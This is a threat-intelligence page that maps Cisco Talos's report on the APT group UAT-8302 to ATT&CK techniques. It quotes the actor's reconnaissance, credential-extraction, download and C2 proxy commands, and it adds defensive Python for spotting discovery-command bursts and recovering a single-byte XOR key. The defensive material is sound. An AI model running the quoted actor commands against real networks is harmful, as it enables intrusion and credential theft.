TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Cisco Talos Intelligence

UAT-8302 and its box full of malware

Jungsoo An · 1 day ago

ATT&CK techniques detected

34 predictions
T1053.005 Scheduled Task
100%
“- Execute a .NET plugin: this functionality is similar to its ability to run arbitrary .NET-based assemblies. Here, the implant runs a provided plugin’s “Plugin.Run” function. Since NetDraft is missing the capability to persist across reboots and relogins, one of the first …”
T1087.002 Domain Account
98%
“) -join ';' }} powershell -command Get-ADComputer -Filter * -Property Name, DNSHostName, OperatingSystem, Description | Select-Object Name, DNSHostName, OperatingSystem, Description | Format-Table -AutoSize powershell -command Get-ADGroup -Filter * -Properties …”
T1055.001 Dynamic-link Library Injection
97%
“in a data file: yandex.exe -r -p:test.ini -s:12 vmtools.exe -r -p:vm.ini -s:12 The executables will sideload a DLL named “mspdb60[.]dll”, which will load and decrypt the “.ini” file specified in the command line — such as “test.ini” or “vm.ini”. Th…”
T1588.002 Tool
96%
“and its SnowLight stager in their operations, along with a new Rust-based stager that we track as SnowRust. Talos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group tasked primarily with obtaining and maintaining long-ter…”
T1090 Proxy
94%
“-nexus threat actors. In parallel, UAT-8302 also deployed DracuLoader, a generic shellcode loader, also used by the Earth Estries and Earth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere: C:\Documents and Settings\All …”
T1482 Domain Trust Discovery
94%
“on the systems to identify them: whoami whoami.exe /groups whoami.exe /priv net.exe user net.exe localgroup net.exe localgroup administrators ipconfig.exe /all arp.exe -a route.exe print netstat.exe -ano cmd.exe /c net share cmd.exe /c wmic startup get caption,…”
T1587.001 Malware
93%
“UAT-8302 and its box full of malware - Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025. -…”
T1654 Log Enumeration
93%
“| Format-List LogName, FileSize, LogMode, MaximumSizeInBytes, RecordCount powershell -command Get-EventLog -LogName System -Source NetLogon -Newest 5000 | Where-Object { $_.Message -match "administrator" } powershell -command chcp 437 > $null; Get-WinEvent -f…”
T1588.001 Malware
88%
“also disclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as LongNosedGoblin. ESET assesses that LongNosedGoblin used NosyDoor/NetDraft and other custom-made malware to target government organizations in Southeast Asia and Japan. Furthermore, as per sol…”
T1055.001 Dynamic-link Library Injection
83%
“…33-0 - Win.Loader.CloudSorcerer-10059634-0 - Win.Malware.CloudSorcerer-10059635-0 - Win.Tool.Dddd-10059636-2 - Win.Tool.Dddd-10059637-0 - Win.Loader.Donut-10059638-0 - Win.Loader.DracuLoader-10059639-0 - Win.Tool.Gogo-10059640-0 - Win…”
T1105 Ingress Tool Transfer
82%
“a stager for the VShell malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded payload is a garbled version of VShell. It is worth noting that Talos observed the same single-byte key and stager being used by UAT-6382 to deliver VShell …”
T1190 Exploit Public-Facing Application
81%
“-8302 in conjunction with each other, a tactic also highlighted by Trend Micro in 2024. Talos’ analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs: - DracuLoader: a generic shellcode loader deployed by UAT-…”
T1055.001 Dynamic-link Library Injection
78%
“…ject itself into explorer.exe, and receive command codes from the C2 via a named pipe, gather disk information, enumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.) and execute shellcode received via the named pipe. - If th…”
T1003.001 LSASS Memory
71%
“\Windows\Temp\result.dat UAT-8302 also uses a tool written in simplified Chinese called “SharpGetUserLoginIPRP” — derived from another Chinese-language repository — which is used to extract login information from a domain controller: C:\ProgramData\s.exe user:…”
T1055.001 Dynamic-link Library Injection
70%
“benign executable is used to side load a malicious dynamic-link library (DLL) based loader. - The loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the existing process. - NetDraft also contains an embedded, .NET-based helper librar…”
T1046 Network Service Discovery
68%
“i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= && echo 192.168.1.%i is alive) > C:\Windows\Temp\alive_hosts.txt UAT-8302 also discovers SMB shares in the network to find reachable remote shares: cmd.exe /q /c (for /l %i in (1,1…”
T1071 Application Layer Protocol
64%
“actors set up. The data blob is decoded to obtain the C2 information, which can exist in one of the following formats depending on the variant of the CloudSorcerer backdoor: - A C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication…”
T1059.001 PowerShell
63%
“…02’s primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. This extended recon is scripted usually using a custom-made PowerShell script such as “whatpc.ps1”: po…”
T1071.001 Web Protocols
58%
“…ware.Agent-10059662-0 The following Snort rules (SIDs) detect and block this threat: - 66055, 66054, 301437, 301436, 301435, 301434, 301433, 301432, 301431 - 66052, 66053, 66050, 66051, 66048, 66049, 66046, 66047, 66044, 66045, 66042, 66043, 66040, 66041 Indicators of c…”
T1105 Ingress Tool Transfer
58%
“shellcode and executes it to download the XOR-encoded final payload, VShell, received from the C2. In one intrusion, UAT-8302 used VShell to deploy a native driver from the Hades HIDS/HIPS software — an open-source Windows host monitoring kernel framework written in simplif…”
T1018 Remote System Discovery
55%
“//github[.]com/chainreactors/gogo/releases/download/v2.14.0/gogo_windows_amd64.exe -o go.exe Additionally, UAT-8302 uses a variety of scanning tools such as qscan, naabu and dddd portqry and httpx to discover services in the network: httpx.exe -sc -…”
T1587.001 Malware
55%
“also disclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as LongNosedGoblin. ESET assesses that LongNosedGoblin used NosyDoor/NetDraft and other custom-made malware to target government organizations in Southeast Asia and Japan. Furthermore, as per sol…”
T1572 Protocol Tunneling
52%
“8302 may also extract login credentials from MobaXterm, a multi-functional and tabbed SSH client, using tools such as MobaXtermDecryptor to pivot to other endpoints. Custom-made malware deployment UAT-8302 deploys a variety of malware families in their intrusions including…”
T1090.001 Internal Proxy
45%
“[.]3:56456 -s <pass> && echo exit) > C:\Windows\Temp\trun.bat ag531.exe -c 45[.]135[.]135[.]100:443 -s <blah> -f agreeduponbyallparties UAT-8302 may use other tools such as anyproxy to set up proxies within the infected enterprise’s network:…”
T1071 Application Layer Protocol
43%
“8302 may also extract login credentials from MobaXterm, a multi-functional and tabbed SSH client, using tools such as MobaXtermDecryptor to pivot to other endpoints. Custom-made malware deployment UAT-8302 deploys a variety of malware families in their intrusions including…”
T1055.001 Dynamic-link Library Injection
40%
“shellcode and executes it to download the XOR-encoded final payload, VShell, received from the C2. In one intrusion, UAT-8302 used VShell to deploy a native driver from the Hades HIDS/HIPS software — an open-source Windows host monitoring kernel framework written in simplif…”
T1543.003 Windows Service
37%
“shellcode and executes it to download the XOR-encoded final payload, VShell, received from the C2. In one intrusion, UAT-8302 used VShell to deploy a native driver from the Hades HIDS/HIPS software — an open-source Windows host monitoring kernel framework written in simplif…”
T1053.005 Scheduled Task
37%
“…02’s primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. This extended recon is scripted usually using a custom-made PowerShell script such as “whatpc.ps1”: po…”
T1059.003 Windows Command Shell
35%
“\Windows\Temp\result.dat UAT-8302 also uses a tool written in simplified Chinese called “SharpGetUserLoginIPRP” — derived from another Chinese-language repository — which is used to extract login information from a domain controller: C:\ProgramData\s.exe user:…”
T1055.001 Dynamic-link Library Injection
33%
“…647-0 - Win.Malware.Snappybee-10059648-0 - Win.Malware.Snappybee-10059649-0 - Win.Malware.Snappybee-10059650-0 - Win.Malware.Snappybee-10059651-0 - Win.Malware.Snappybee-10059652-0 - Win.Malware.Snappybee-10059653-0 - Win.Malware.SnowRust…”
T1552.005 Cloud Instance Metadata API
33%
“for Azure AD Connect/Entra ID Connect credential extraction: python.exe adconnectdump.py Manual extraction UAT-8302 may also directly query the AD user and computer objects to obtain information from them via PowerShell: powershell -command Get-ADUser -Filter * -Prop…”
T1068 Exploitation for Privilege Escalation
33%
“shellcode and executes it to download the XOR-encoded final payload, VShell, received from the C2. In one intrusion, UAT-8302 used VShell to deploy a native driver from the Hades HIDS/HIPS software — an open-source Windows host monitoring kernel framework written in simplif…”
T1055.001 Dynamic-link Library Injection
32%
“actors set up. The data blob is decoded to obtain the C2 information, which can exist in one of the following formats depending on the variant of the CloudSorcerer backdoor: - A C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication…”
T1587 Develop Capabilities
32%
“UAT-8302 and its box full of malware - Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025. -…”
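The discovery entries above (T1482, T1087.002, T1046, T1059.001) quote the exact command sequence UAT-8302 runs on every endpoint it reaches: whoami /groups, net localgroup administrators, ipconfig /all, netstat -ano, net share, wmic startup, Get-ADComputer, and a batch ping sweep. Individually every one of those is routine admin activity; the signal is the burst of distinct discovery categories from one host in a few minutes. The following is an added example, not code from the Talos write-up, that scores process-creation events that way. It assumes you already have such events (Sysmon event 1, Windows 4688, or EDR telemetry) flattened to timestamp, host and command line; the events in the block are constructed samples, not telemetry from a real intrusion, and the category names and thresholds are the example's own.

```python
"""Flag a burst of discovery commands on one endpoint (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule is (category, regex over the normalised command line). Counting
# distinct categories rather than raw hits is the point: ten whoami calls are
# one signal, whoami + net localgroup + netstat + a ping sweep are four.
DISCOVERY_RULES = [
    ("user_context",   re.compile(r"^whoami(\s+/(groups|priv|all))?$")),
    ("local_accounts", re.compile(r"^net\s+(user|localgroup)\b")),
    ("net_config",     re.compile(r"^(ipconfig\s+/all|arp\s+-a|route\s+print)$")),
    ("connections",    re.compile(r"^netstat\s+-ano\b")),
    ("shares",         re.compile(r"^(cmd\s+/c\s+)?net\s+share\b")),
    ("autostart",      re.compile(r"^(cmd\s+/c\s+)?wmic\s+startup\s+get\b")),
    ("ad_enum",        re.compile(r"get-ad(user|computer|group)\s+-filter\b")),
    ("ping_sweep",     re.compile(r"for\s+/l\s+%\w+\s+in\s+\(.*\bping\s+-n\s+1\b")),
]


def normalise(cmdline: str) -> str:
    """Lower-case, drop the image path and .exe suffix, squash whitespace, so
    'C:\\Windows\\System32\\whoami.exe  /groups' becomes 'whoami /groups'.
    Assumes the image path has no spaces; real pipelines should take the
    program name from the event's Image/NewProcessName field instead."""
    cmd = " ".join(cmdline.split()).lower()
    if not cmd:
        return cmd
    prog, _, rest = cmd.partition(" ")
    prog = prog.strip('"').rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    if prog.endswith(".exe"):
        prog = prog[:-4]
    return (prog + " " + rest).strip()


def classify(cmdline: str) -> list:
    """Discovery categories one command line falls into (usually none)."""
    norm = normalise(cmdline)
    return [cat for cat, rx in DISCOVERY_RULES if rx.search(norm)]


def find_recon_bursts(events, window=timedelta(minutes=10), min_categories=4):
    """Return {host: (window_start, sorted categories)} for each host that runs
    at least `min_categories` distinct discovery categories inside `window`.
    The defaults are a starting point to tune against your own baseline."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        for cat in classify(ev["cmd"]):
            per_host[ev["host"]].append((ts, cat))
    alerts = {}
    for host, hits in per_host.items():
        for i, (start, _) in enumerate(hits):      # slide the window start
            cats = {c for t, c in hits[i:] if t - start <= window}
            if len(cats) >= min_categories:
                alerts[host] = (start, sorted(cats))
                break
    return alerts


# Constructed sample events (not real telemetry). WS-042 runs the sequence the
# write-up quotes; HELPDESK-7 is an admin debugging a NIC; DC-1 is an inventory
# job that only queries AD.
SAMPLE_EVENTS = [
    {"ts": "2025-03-04T10:00:01", "host": "WS-042", "cmd": r"whoami"},
    {"ts": "2025-03-04T10:00:03", "host": "WS-042", "cmd": r"whoami.exe /groups"},
    {"ts": "2025-03-04T10:00:05", "host": "WS-042", "cmd": r"whoami.exe /priv"},
    {"ts": "2025-03-04T10:00:09", "host": "WS-042", "cmd": r"net.exe user"},
    {"ts": "2025-03-04T10:00:12", "host": "WS-042", "cmd": r"net.exe localgroup administrators"},
    {"ts": "2025-03-04T10:00:20", "host": "WS-042", "cmd": r"ipconfig.exe /all"},
    {"ts": "2025-03-04T10:00:22", "host": "WS-042", "cmd": r"arp.exe -a"},
    {"ts": "2025-03-04T10:00:25", "host": "WS-042", "cmd": r"route.exe print"},
    {"ts": "2025-03-04T10:00:30", "host": "WS-042", "cmd": r"netstat.exe -ano"},
    {"ts": "2025-03-04T10:00:40", "host": "WS-042", "cmd": r'"C:\Windows\System32\cmd.exe" /c net share'},
    {"ts": "2025-03-04T10:00:45", "host": "WS-042", "cmd": r"cmd.exe /c wmic startup get caption"},
    {"ts": "2025-03-04T10:01:30", "host": "WS-042", "cmd": r"cmd.exe /q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= && echo 192.168.1.%i is alive) > C:\Windows\Temp\alive_hosts.txt"},
    {"ts": "2025-03-04T10:05:00", "host": "HELPDESK-7", "cmd": r"ipconfig.exe /all"},
    {"ts": "2025-03-04T11:10:00", "host": "HELPDESK-7", "cmd": r"netstat.exe -ano"},
    {"ts": "2025-03-04T10:07:00", "host": "DC-1", "cmd": r"powershell -command Get-ADComputer -Filter * -Property Name,DNSHostName,OperatingSystem,Description | Select-Object Name,DNSHostName,OperatingSystem,Description | Format-Table -AutoSize"},
]

if __name__ == "__main__":
    for host, (start, cats) in find_recon_bursts(SAMPLE_EVENTS).items():
        print(f"{host}: {len(cats)} discovery categories from {start.isoformat()}: {', '.join(cats)}")
```

Only WS-042 alerts: HELPDESK-7 hits two categories an hour apart, and DC-1's scheduled Get-ADComputer is a single category. Category counting is what keeps the rule quiet on hosts where one or two of these commands are normal, while still catching the actor's script even if it reorders or skips a few commands.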
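The two T1105 entries above describe the VShell stager: it downloads the final payload and decodes it with a single-byte XOR, key 0x99, the same key and stager Talos saw UAT-6382 use. When you hold the encoded blob (from a proxy capture, a sandbox, or the loader's own download), do not just apply the key from the report: brute-force all 256 keys and rank the candidates by how much the result looks like a Windows executable, which also confirms the key when the sample differs from the one written up. The following is an added example, not code from the Talos write-up. The encoded blob is constructed in the block (a minimal fake PE header with pseudo-random filler, not VShell), so the PE markers all land cleanly; the write-up notes that the real decoded payload is a garbled version of VShell, so on real samples expect the header checks to score lower and the string markers to carry the ranking.

```python
"""Recover a single-byte XOR key from a downloaded payload (added example)."""
import random

# (marker, required offset or None for "anywhere", weight)
MARKERS = [
    (b"MZ", 0, 3),
    (b"PE\x00\x00", None, 2),
    (b"This program cannot be run in DOS mode", None, 2),
    (b".text", None, 2),
    (b".rdata", None, 2),
]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key; XOR is its own inverse, so this both
    encodes (what the stager's server side did) and decodes."""
    return bytes(b ^ key for b in data)


def pe_score(candidate: bytes) -> int:
    """Marker hits dominate; the printable-byte ratio only breaks ties, since
    genuine code sections look like noise under every key."""
    score = 0
    for marker, offset, weight in MARKERS:
        if offset is None:
            hit = marker in candidate
        else:
            hit = candidate[offset:offset + len(marker)] == marker
        score += weight if hit else 0
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in candidate)
    return score * 1000 + printable * 1000 // max(len(candidate), 1)


def recover_key(blob: bytes, top: int = 3):
    """Try every single-byte key; return (best_key, decoded, ranked) where
    ranked holds the `top` (key, score) pairs. A best key of 0x00 means the
    blob was not XOR-encoded at all, or not with a single byte."""
    ranked = sorted(((k, pe_score(xor_bytes(blob, k))) for k in range(256)),
                    key=lambda ks: ks[1], reverse=True)
    best_key = ranked[0][0]
    return best_key, xor_bytes(blob, best_key), ranked[:top]


def build_fake_pe() -> bytes:
    """Constructed stand-in for a payload: DOS header with the usual stub
    message, a PE signature at e_lfanew, two section names and pseudo-random
    'code'. Not a loadable PE and not VShell."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")          # e_lfanew
    msg = b"This program cannot be run in DOS mode.\r\n$"
    hdr[0x4E:0x4E + len(msg)] = msg
    rng = random.Random(8302)                              # deterministic filler
    body = bytes(rng.getrandbits(8) for _ in range(2048))
    return (bytes(hdr) + b"PE\x00\x00" + b"\x64\x86"
            + b".text\x00\x00\x00" + b".rdata\x00\x00" + body)


# Constructed sample: what the stager's download looks like on the wire after
# the single-byte 0x99 encoding the write-up describes.
ENCODED_SAMPLE = xor_bytes(build_fake_pe(), 0x99)

if __name__ == "__main__":
    key, decoded, ranked = recover_key(ENCODED_SAMPLE)
    print(f"best key 0x{key:02x}; top candidates: "
          + ", ".join(f"0x{k:02x}={s}" for k, s in ranked))
    print("decoded header:", decoded[:2], decoded[0x80:0x84])
```

The ranking gap between the best key and the runner-up is the useful diagnostic: a clear winner with MZ at offset 0 and the DOS stub string present means a plain single-byte XOR; a flat ranking means the encoding is something else (a multi-byte key, RC4, or compression on top), and the next step is the loader's own decode routine rather than more brute force.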

Summary

Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.